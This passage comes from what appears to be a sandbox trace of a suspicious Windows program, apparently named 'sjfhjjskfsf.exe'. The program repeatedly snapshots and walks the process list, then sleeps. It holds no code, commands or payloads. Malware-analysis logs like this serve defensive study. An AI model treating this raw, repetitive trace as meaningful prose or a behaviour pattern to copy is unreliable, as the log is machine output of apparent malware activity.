th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.002] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.003] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.003] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.003] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.004] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0224.004] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.004] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.004] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.005] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.005] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.005] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.006] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.006] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.006] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.006] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.007] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.007] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.007] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.008] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0224.008] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0224.008] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0224.008] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0224.009] Sleep (dwMilliseconds=0x64) [0224.110] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x280 [0224.111] Process32FirstW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.112] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.112] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.112] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.112] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.113] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.113] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.113] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.114] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.114] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0224.114] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.114] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.115] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.115] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.115] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.116] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.116] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.116] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.116] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.117] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.117] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.117] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.118] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.118] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0224.118] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0224.118] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0224.119] Process32NextW (in: hSnapshot=0x280, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0224.119] Sleep (dwMilliseconds=0x64) [0224.223] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x284 [0224.225] Process32FirstW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.225] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.225] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.226] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.226] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.226] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.227] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.227] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.227] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.227] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0224.228] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.228] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.228] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.229] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.229] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.229] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.229] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.230] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.230] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.230] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.231] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.231] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.231] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.231] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0224.232] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0224.232] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0224.232] Process32NextW (in: hSnapshot=0x284, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0224.233] Sleep (dwMilliseconds=0x64) [0224.327] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x288 [0224.328] Process32FirstW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.328] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.329] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.329] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.329] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.330] Process32NextW (in: hSnapshot=0x288, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, 